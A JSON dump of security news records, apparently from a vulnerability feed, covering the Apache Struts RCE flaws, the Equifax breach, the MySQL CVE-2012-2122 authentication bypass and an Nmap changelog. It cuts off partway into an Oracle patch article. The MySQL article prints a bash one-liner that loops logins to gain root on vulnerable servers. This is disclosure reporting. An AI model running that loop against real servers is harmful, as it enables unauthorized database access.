{"thn": [{"lastseen": "2022-05-09T12:40:18", "description": "[](<https://thehackernews.com/images/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png>)\n\nSemmle security researcher Man Yue Mo has [disclosed](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>) a critical remote code execution vulnerability in the popular Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. \n \nApache Struts is an open source framework for developing web applications in the Java programming language and is widely used by enterprises globally, including by 65 percent of the Fortune 100 companies, like Vodafone, Lockheed Martin, Virgin Atlantic, and the IRS. \n \nThe vulnerability (**CVE-2018-11776**) resides in the core of Apache Struts and originates because of insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations. \n \nThe newly found Apache Struts exploit can be triggered just by visiting a specially crafted URL on the affected web server, allowing attackers to execute malicious code and eventually take complete control over the targeted server running the vulnerable application. \n \n\n\n## Struts2 Vulnerability - Are You Affected?\n\n \nAll applications that use Apache Struts\u2014supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions\u2014are potentially vulnerable to this flaw, even when no additional plugins have been enabled. \n \n\n\n> \"This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\" Yue Mo said.\n\n \nYour Apache Struts implementation is vulnerable to the reported RCE flaw if it meets the following conditions: \n\n\n * The **alwaysSelectFullNamespace** flag is set to true in the Struts configuration.\n * Struts configuration file contains an \"action\" or \"url\" tag that does not specify the optional namespace attribute or specifies a wildcard namespace.\nAccording to the researcher, even if an application is currently not vulnerable, \"an inadvertent change to a Struts configuration file may render the application vulnerable in the future.\" \n \n\n\n## Here's Why You Should Take Apache Struts Exploit Seriously\n\n \nLess than a year ago, credit rating agency Equifax exposed [personal details of its 147 million consumers](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) due to their failure of patching a similar [Apache Struts flaw](<https://thehackernews.com/2017/03/apache-struts-framework.html>) that was disclosed earlier that year (CVE-2017-5638). \n \nThe Equifax breach cost the company over $600 million in losses. \n\n\n> \"Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\" said Pavel Avgustinov, Co-founder & VP of QL Engineering at Semmle.\n\n> \"A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system.\"\n\n \n\n\n## Patch Released for Critical Apache Struts Bug\n\n[](<https://thehackernews.com/images/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png>)\n\nApache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. Organizations and developers who use Apache Struts are urgently advised to upgrade their Struts components as soon as possible. \n \nWe have seen how previous disclosures of similar critical flaws in Apache Struts have resulted in [PoC exploits](<https://thehackernews.com/2017/03/apache-struts-framework.html>) being published within a day, and exploitation of the [vulnerability in the wild](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>), putting critical infrastructure as well as customers' data at risk. \n \nTherefore, users and administrators are strongly advised to upgrade their Apache Struts components to the latest versions, even if they believe their configuration is not vulnerable right now. \n \nThis is not the first time the Semmle Security Research Team has reported a critical RCE flaw in Apache Struts. Less than a year ago, the team disclosed a similar [remote code execution vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) (CVE-2017-9805) in Apache Struts. \n \n\n\n## UPDATE \u2014 Apache Struts RCE Exploit PoC Released\n\n[](<https://thehackernews.com/images/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png>)\n\nA security researcher has today released [a PoC exploit](<https://github.com/jas502n/St2-057/blob/master/README.md>) for the newly discovered remote code execution (RCE) vulnerability (CVE-2018-11776) in Apache Struts web application framework.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-22T14:04:00", "type": "thn", "title": "New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T18:30:56", "id": "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "href": "https://thehackernews.com/2018/08/apache-struts-vulnerability.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:55", "description": "[](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache patched over two months earlier of the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a critical vulnerability on time, for which patches were already issued by the respected companies. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month, which was a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them, and was fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches were made available and proofs that the flaw was already under mass attack by hackers, Equifax failed to patched its Web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). \n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) with a new \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's Threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run both front-end and back-end Web servers. The framework is used by 65n per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "cvss3": {}, "published": "2017-09-13T21:38:00", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T10:00:54", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-05-11T00:22:16", "description": "**CVE-2012-2122** : Serious Mysql Authentication Bypass Vulnerability \n[](<https://thehackernews.com/images/-6jMf6sLY9aE/T9WeJI9dvhI/AAAAAAAAGkg/ZhVrqeqlTPo/s728-e365/mysql_logo.jpg>)A serious security bug in MariaDB and MySQL Disclosed, According to [Advisory](<https://mariadb.atlassian.net/browse/MDEV-212>) All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. This issue got assigned an id CVE-2012-2122.\n\n \n\n\n\"**_When a user connects to MariaDB/MySQL, a token (SHAover a password and a random scramble string) is calculated and comparedwith the expected value. Because of incorrect casting, it might'vehappened that the token and the expected value were considered equal,even if the memcmp() returned a non-zero value. In this caseMySQL/MariaDB would think that the password is correct, even while it isnot. Because the protocol uses random strings, the probability ofhitting this bug is about 1/256_**.\"\n\n \n\n\n\"**_Which means, if one knows a user name to connect (and \"root\" almostalways exists), she can connect using *any* password by repeatingconnection attempts. ~300 attempts takes only a fraction of second, sobasically account password protection is as good as nonexistent.Any client will do, there's no need for a special libmysqlclient library._**\"\n\n \nThe following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password. \n \n**$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done** \n**mysql>**\n\n** \n**\n\n**Defense: **The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.\n\n \n\n\nthe easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the \"bind-address\" parameter to \"127.0.0.1\". Restart the MySQL service to apply this setting.\n\n \n\n\n**Note:** Download The Latest Exploits for **CVE-2012-2122 **From our **[TOOLS YARD](<https://tools.thehackernews.com/2012/06/cve-2012-2122-mysql-authentication.html>) **section**.**\n", "cvss3": {}, "published": "2012-06-11T07:29:00", "type": "thn", "title": "CVE-2012-2122 : Serious Mysql Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2122"], "modified": "2012-10-08T20:49:26", "id": "THN:C9572CC7B2ED12B73BBF9433A2828472", "href": "https://thehackernews.com/2012/06/cve-2012-2122-serious-mysql.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-15T00:23:26", "description": "**Nmap 5.59 BETA1** \\- 40 new NSE scripts & improved IPv6 \n\n\n[](<https://thehackernews.com/images/-yrbet18UC8c/Tg2xQHffQ7I/AAAAAAAACWU/GuKkAlYcRPg/s728-e365/2dlogo.jpg>)\n\n**Official Change Log:** \n \no [NSE] Added 40 scripts, bringing the total to 217! You can learn \nmore about any of them at https://nmap.org/nsedoc/. Here are the new \nones (authors listed in brackets): \n \n\\+ afp-ls: Lists files and their attributes from Apple Filing \nProtocol (AFP) volumes. [Patrik Karlsson] \n \n\\+ backorifice-brute: Performs brute force password auditing against \nthe BackOrifice remote administration (trojan) service. [Gorjan \nPetrovski] \n \n\\+ backorifice-info: Connects to a BackOrifice service and gathers \ninformation about the host and the BackOrifice service \nitself. [Gorjan Petrovski] \n \n\\+ broadcast-avahi-dos: Attempts to discover hosts in the local \nnetwork using the DNS Service Discovery protocol, then tests \nwhether each host is vulnerable to the Avahi NULL UDP packet \ndenial of service bug (CVE-2011-1002). [Djalal Harouni] \n \n\\+ broadcast-netbios-master-browser: Attempts to discover master \nbrowsers and the Windows domains they manage. [Patrik Karlsson] \n \n\\+ broadcast-novell-locate: Attempts to use the Service Location \nProtocol to discover Novell NetWare Core Protocol (NCP) \nservers. [Patrik Karlsson] \n \n\\+ creds-summary: Lists all discovered credentials (e.g. from brute \nforce and default password checking scripts) at end of scan. \n[Patrik Karlsson] \n \n\\+ dns-brute: Attempts to enumerate DNS hostnames by brute force \nguessing of common subdomains. [Cirrus] \n \n\\+ dns-nsec-enum: Attempts to discover target hosts' services using \nthe DNS Service Discovery protocol. [Patrik Karlsson] \n \n\\+ dpap-brute: Performs brute force password auditing against an \niPhoto Library. [Patrik Karlsson] \n \n\\+ epmd-info: Connects to Erlang Port Mapper Daemon (epmd) and \nretrieves a list of nodes with their respective port \nnumbers. [Toni Ruottu] \n \n\\+ http-affiliate-id: Grabs affiliate network IDs (e.g. Google \nAdSense or Analytics, Amazon Associates, etc.) from a web \npage. These can be used to identify pages with the same \nowner. [Hani Benhabiles, Daniel Miller] \n \n\\+ http-barracuda-dir-traversal: Attempts to retrieve the \nconfiguration settings from a Barracuda Networks Spam & Virus \nFirewall device using the directory traversal vulnerability \ndescribed at \nhttps://seclists.org/fulldisclosure/2010/Oct/119. [Brendan Coles] \n \n\\+ http-cakephp-version: Obtains the CakePHP version of a web \napplication built with the CakePHP framework by fingerprinting \ndefault files shipped with the CakePHP framework. [Paulino \nCalderon] \n \n\\+ http-majordomo2-dir-traversal: Exploits a directory traversal \nvulnerability existing in the Majordomo2 mailing list manager to \nretrieve remote files. (CVE-2011-0049). [Paulino Calderon] \n \n\\+ http-wp-plugins: Tries to obtain a list of installed WordPress \nplugins by brute force testing for known plugins. [Ange Gutek] \n \n\\+ ip-geolocation-geobytes: Tries to identify the physical location \nof an IP address using the Geobytes geolocation web service \n(https://www.geobytes.com/iplocator.htm). [Gorjan Petrovski] \n \n\\+ ip-geolocation-geoplugin: Tries to identify the physical location \nof an IP address using the Geoplugin geolocation web service \n(https://www.geoplugin.com/). [Gorjan Petrovski] \n \n\\+ ip-geolocation-ipinfodb: Tries to identify the physical location \nof an IP address using the IPInfoDB geolocation web service \n(https://ipinfodb.com/ip_location_api.php). [Gorjan Petrovski] \n \n\\+ ip-geolocation-maxmind: Tries to identify the physical location of \nan IP address using a Geolocation Maxmind database file (available \nfrom https://www.maxmind.com/app/ip-location). [Gorjan Petrovski] \n \n\\+ ldap-novell-getpass: Attempts to retrieve the Novell Universal \nPassword for a user. You must already have (and include in script \narguments) the username and password for an eDirectory server \nadministrative account. [Patrik Karlsson] \n \n\\+ mac-geolocation: Looks up geolocation information for BSSID (MAC) \naddresses of WiFi access points in the Google geolocation \ndatabase. [Gorjan Petrovski] \n \n\\+ mysql-audit: Audit MySQL database server security configuration \nagainst parts of the CIS MySQL v1.0.2 benchmark (the engine can \nalso be used for other MySQL audits by creating appropriate audit \nfiles). [Patrik Karlsson] \n \n\\+ ncp-enum-users: Retrieves a list of all eDirectory users from the \nNovell NetWare Core Protocol (NCP) service. [Patrik Karlsson] \n \n\\+ ncp-serverinfo: Retrieves eDirectory server information (OS \nversion, server name, mounts, etc.) from the Novell NetWare Core \nProtocol (NCP) service. [Patrik Karlsson] \n \n\\+ nping-brute: Performs brute force password auditing against an \nNping Echo service. [Toni Ruottu] \n \n\\+ omp2-brute: Performs brute force password auditing against the \nOpenVAS manager using OMPv2. [Henri Doreau] \n \n\\+ omp2-enum-targets: Attempts to retrieve the list of target systems \nand networks from an OpenVAS Manager server. [Henri Doreau] \n \n\\+ ovs-agent-version: Detects the version of an Oracle OVSAgentServer \nby fingerprinting responses to an HTTP GET request and an XML-RPC \nmethod call. [David Fifield] \n \n\\+ quake3-master-getservers: Queries Quake3-style master servers for \ngame servers (many games other than Quake 3 use this same \nprotocol). [Toni Ruottu] \n \n\\+ servicetags: Attempts to extract system information (OS, hardware, \netc.) from the Sun Service Tags service agent (UDP port \n6481). [Matthew Flanagan] \n \n\\+ sip-brute: Performs brute force password auditing against Session \nInitiation Protocol (SIP - \n \nhttps://en.wikipedia.org/wiki/Session_Initiation_Protocol) \n \naccounts. This protocol is most commonly associated with VoIP \nsessions. [Patrik Karlsson] \n \n\\+ sip-enum-users: Attempts to enumerate valid SIP user accounts. \nCurrently only the SIP server Asterisk is supported. [Patrik \nKarlsson] \n \n\\+ smb-mbenum: Queries information managed by the Windows Master \nBrowser. [Patrik Karlsson] \n \n\\+ smtp-vuln-cve2010-4344: Checks for and/or exploits a heap overflow \nwithin versions of Exim prior to version 4.69 (CVE-2010-4344) and \na privilege escalation vulnerability in Exim 4.72 and prior \n(CVE-2010-4345). [Djalal Harouni] \n \n\\+ smtp-vuln-cve2011-1720: Checks for a memory corruption in the \nPostfix SMTP server when it uses Cyrus SASL library authentication \nmechanisms (CVE-2011-1720). This vulnerability can allow denial \nof service and possibly remote code execution. [Djalal Harouni] \n \n\\+ snmp-ios-config: Attempts to downloads Cisco router IOS \nconfiguration files using SNMP RW (v1) and display or save \nthem. [Vikas Singhal, Patrik Karlsson] \n \n\\+ ssl-known-key: Checks whether the SSL certificate used by a host \nhas a fingerprint that matches an included database of problematic \nkeys. [Mak Kolybabi] \n \n\\+ targets-sniffer: Sniffs the local network for a configurable \namount of time (10 seconds by default) and prints discovered \naddresses. If the newtargets script argument is set, discovered \naddresses are added to the scan queue. [Nick Nikolaou] \n \n\\+ xmpp: Connects to an XMPP server (port 5222) and collects server \ninformation such as supported auth mechanisms, compression methods \nand whether TLS is supported and mandatory. [Vasiliy Kulikov] \n \no Nmap has long supported IPv6 for basic (connect) port scans, basic \nhost discovery, version detection, Nmap Scripting Engine. This \nrelease dramatically expands and improves IPv6 support: \n\\+ IPv6 raw packet scans (including SYN scan, UDP scan, ACK scan, \netc.) are now supported. [David, Weilin] \n\\+ IPv6 raw packet host discovery (IPv6 echo requests, TCP/UDP \ndiscovery packets, etc.) is now supported. [David, Weilin] \n\\+ IPv6 traceroute is now supported [David] \n\\+ IPv6 protocol scan (-sO) is now supported, including creating \nrealistic headers for many protocols. [David] \n\\+ IPv6 support to the wsdd, dnssd and upnp NSE libraries. [Daniel \nMiller, Patrik] \n\\+ The --exclude and --excludefile now support IPV6 addresses with \nnetmasks. [Colin] \n \no Scanme.Nmap.Org (the system anyone is allowed to scan for testing \npurposes) is now dual-stacked (has an IPv6 address as well as IPv4) \nso you can scan it during IPv6 testing. We also added a DNS record \nfor ScanmeV6.nmap.org which is IPv6-only. See \nhttps://seclists.org/nmap-dev/2011/q2/428. [Fyodor] \n \no The Nmap.Org website as well as sister sites Insecure.Org, \nSecLists.Org, and SecTools.Org all have working IPv6 addresses now \n(dual stacked). [Fyodor] \n \no Nmap now determines the filesystem location it is being run from and \nthat path is now included early in the search path for data files \n(such as nmap-services). This reduces the likelihood of needing to \nspecify --datadir or getting data files from a different version of \nNmap installed on the system. For full details, see \nhttps://nmap.org/book/data-files-replacing-data-files.html. Thanks \nto Solar Designer for implementation advice. [David] \n \no Created a page on our SecWiki for collecting Nmap script ideas! If \nyou have a good idea, post it to the incoming section of the page. \nOr if you're in a script writing mood but don't know what to write, \ncome here for inspiration: https://secwiki.org/w/Nmap_Script_Ideas. \n \no The development pace has greatly increased because Google (again) \nsponsored a 7 full-time college and graduate student programmer \ninterns this summer as part of their Summer of Code program! \nThanks, Google Open Source Department! We're delighted to introduce \nthe team: https://seclists.org/nmap-dev/2011/q2/312 \n \no [NSE] Added 7 new protocol libraries, bringing the total to 66. You \ncan read about them all at https://nmap.org/nsedoc/. Here are the new \nones (authors listed in brackets): \n \n\\+ creds: Handles storage and retrieval of discovered credentials \n(such as passwords discovered by brute force scripts). [Patrik \nKarlsson] \n \n\\+ ncp: A tiny implementation of Novell Netware Core Protocol \n(NCP). [Patrik Karlsson] \n \n\\+ omp2: OpenVAS Management Protocol (OMP) version 2 support. [Henri \nDoreau] \n \n\\+ sip: Supports a limited subset of SIP commands and \nmethods. [Patrik Karlsson] \n \n\\+ smtp: Simple Mail Transfer Protocol (SMTP) operations. [Djalal \nHarouni] \n \n\\+ srvloc: A relatively small implementation of the Service Location \nProtocol. [Patrik Karlsson] \n \n\\+ tftp: Implements a minimal TFTP server. It is used in \nsnmp-ios-config to obtain router config files.[Patrik Karlsson] \n \no Improved Nmap's service/version detection database by adding: \n\\+ Apple iPhoto (DPAP) protocol probe [Patrik] \n\\+ Zend Java Bridge probe [Michael Schierl] \n\\+ BackOrifice probe [Gorjan Petrovski] \n\\+ GKrellM probe [Toni Ruotto] \n\\+ Signature improvements for a wide variety of services (we now have \n7,375 signatures) \n \no [NSE] ssh-hostkey now additionally has a postrule that prints hosts \nfound during the scan which share the same hostkey. [Henri Doreau] \n \no [NSE] Added 300+ new signatures to http-enum which look for admin \ndirectories, JBoss, Tomcat, TikiWiki, Majordomo2, MS SQL, WordPress, \nand more. [Paulino] \n \no Made the final IP address space assignment update as all available \nIPv4 address blocks have now been allocated to the regional \nregistries. Our random IP generation (-iR) logic now only excludes \nthe various reserved blocks. Thanks to Kris for years of regular \nupdates to this function! \n \no [NSE] Replaced http-trace with a new more effective version. [Paulino] \n \no Performed some output cleanup work to remove unimportant status \nlines so that it is easier to find the good stuff! [David] \n \no [Zenmap] now properly kills Nmap scan subprocess when you cancel a \nscan or quit Zenmap on Windows. [Shinnok] \n \no [NSE] Banned scripts from being in both the \"default\" and \n\"intrusive\" categories. We did this by removing dhcp-discover and \ndns-zone-transfer from the set of scripts run by default (leaving \nthem \"intrusive\"), and reclassifying dns-recursion, ftp-bounce, \nhttp-open-proxy, and socks-open-proxy as \"safe\" rather than \n\"intrusive\" (keeping them in the \"default\" set). \n \no [NSE] Added a credential storage library (creds.lua) and modified \nthe brute library and scripts to make use of it. [Patrik] \n \no [Ncat] Created a portable version of ncat.exe that you can just drop \nonto Microsoft Windows systems without having to run any installer \nor copy over extra library files. See the Ncat page \n(https://nmap.org/ncat/) for binary downloads and a link to build \ninstructions. [Shinnok] \n \no Fix a segmentation fault which could occur when running Nmap on \nvarious Android-based phones. The problem related to NULL being \npassed to freeaddrinfo(). [David, Vlatko Kosturjak] \n \no [NSE] The host.bin_ip and host.bin_ip_src entries now also work with \n16-byte IPv6 addresses. [David] \n \no [Ncat] Updated the ca-bundle.crt list of trusted certificate \nauthority certificates. [David] \n \no [NSE] Fixed a bug in the SMB Authentication library which could \nprevent concurrently running scripts with valid credentials from \nlogging in. [Chris Woodbury] \n \no [NSE] Re-worked http-form-brute.nse to better autodetect form \nfields, allow brute force attempts where only the password (no \nusername) is needed, follow HTTP redirects, and better detect \nincorrect login attempts. [Patrik, Daniel Miller] \n \no [Zenmap] Changed the \"slow comprehensive scan\" profile's NSE script \nselection from \"all\" to \"default or (discovery and safe)\" \ncategories. Except for testing and debugging, \"--script all\" is \nrarely desirable. \n \no [NSE] Added the stdnse.silent_require method which is used for \nlibrary requires that you know might fail (e.g. \"openssl\" fails if \nNmap was compiled without that library). If these libraries are \ncalled with silent_require and fail to load, the script will cease \nrunning but the user won't be presented with ugly failure messages \nas would happen with a normal require. [Patrick Donnelly] \n \no [Ncat] ncat now listens on both localhost and ::1 when you run ncat \n-l. It works as before if you specify -4 or -6 or a specific \naddress. [Colin Rice] \n \no [Zenmap] Fixed a bug in topology mapper which caused endpoints \nbehind firewalls to sometimes show up in the wrong place (see \nhttps://seclists.org/nmap-dev/2011/q2/733). [Colin Rice] \n \no [Zenmap] If you scan a system twice, any open ports from the first \nscan which are closed in the 2nd will be properly marked as \nclosed. [Colin Rice]. \n \no [Zenmap] Fixed an error that could cause a crash (\"TypeError: an \ninteger is required\") if a sort column in the ports table was unset. \n[David] \n \no [Ndiff] Added nmaprun element information (Nmap version, scan date, \netc.) to the diff. Also, the Nmap banner with version number and \ndata is now only printed if there were other differences in the \nscan. [Daniel Miller, David, Dr. Jesus] \n \no [NSE] Added nmap.get_interface and nmap.get_interface_info functions \nso scripts can access characteristics of the scanning interface. \nRemoved nmap.get_interface_link. [Djalal] \n \no Fixed an overflow in scan elapsed time display that caused negative \ntimes to be printed after about 25 days. [Daniel Miller] \n \no Updated nmap-rpc from the master list, now maintained by IANA. \n[Daniel Miller, David] \n \no [Zenmap] Fixed a bug in the option parser: -sN (null scan) was \ninterpreted as -sn (no port scan). This was reported by \nShitaneddine. [David] \n \no [Ndiff] Fixed the Mac OS X packages to use the correct path for \nPython: /usr/bin/python instead of /opt/local/bin/python. The bug \nwas reported by Wellington Castello. [David] \n \no Removed the -sR (RPC scan) option--it is now an alias for -sV \n(version scan), which always does RPC scan when an rpcinfo service \nis detected. \n \no [NSE] Improved the ms-sql scripts and library in several ways: \n\\- Improved version detection and server discovery \n\\- Added support for named pipes, integrated authentication, and \nconnecting to instances by name or port \n\\- Improved script and library stability and documentation. \n[Patrik Karlsson, Chris Woodbury] \n \no [NSE] Fixed http.validate_options when handling a cookie table. \n[Sebastian Prengel] \n \no Added a Service Tags UDP probe for port 6481/udp. [David] \n \no [NSE] Enabled firewalk.nse to automatically find the gateways at \nwhich probes are dropped and fixed various bugs. [Henri Doreau] \n \no [Zenmap] Worked around a pycairo bug that prevented saving the \ntopology graphic as PNG on Windows: \"Error Saving Snapshot: \nSurface.write_to_png takes one argument which must be a filename \n(str), file object, or a file-like object which has a 'write' method \n(like StringIO)\". The problem was reported by Alex Kah. [David] \n \no The -V and --version options now show the platform Nmap was compiled \non, which features are compiled in, the version numbers of libraries \nit is linked against, and whether the libraries are the ones that \ncome with Nmap or the operating system. [Ambarisha B., David] \n \no Fixed some inconsistencies in nmap-os-db reported by Xavier Sudre \nfrom netVigilance. \n \no The Nmap Win32 uninstaller now properly deletes nping.exe. [Fyodor] \n \no [NSE] Added a shortport.ssl function which can be used as a script \nportrule to match SSL services. It is similar in concept to our \nexisting shortport.http. [David] \n \no Set up the RPM build to use the compat-glibc and compat-gcc-34-c++ \npackages (on CentOS 5.3) to resolve a report of Nmap failing to run \non old versions of Glibc. [David] \n \no We no longer support Nmap on versions of Windows earlier than XP \nSP2. Even Microsoft no longer supports Windows versions that old. \nBut if you must use Nmap on such systems anyway, please see \n \nhttps://secwiki.org/w/Nmap_On_Old_Windows_Releases. \n \no There were hundreds of other little bug fixes and improvements \n(especially to NSE scripts). See the SVN logs for revisions 22,274 \nthrough 24,460 for details. \n \n[**Download Here**](<https://nmap.org/download.html>) \n\n", "cvss3": {}, "published": "2011-07-01T11:41:00", "type": "thn", "title": "Nmap 5.59 BETA1 - 40 new NSE scripts & improved IPv6", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4344", "CVE-2010-4345", "CVE-2011-0049", "CVE-2011-1002", "CVE-2011-1720"], "modified": "2011-07-01T11:41:06", "id": "THN:20485C79F4F229C0B6354F5C32C17156", "href": "https://thehackernews.com/2011/07/nmap-559-beta1-40-new-nse-scripts.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are 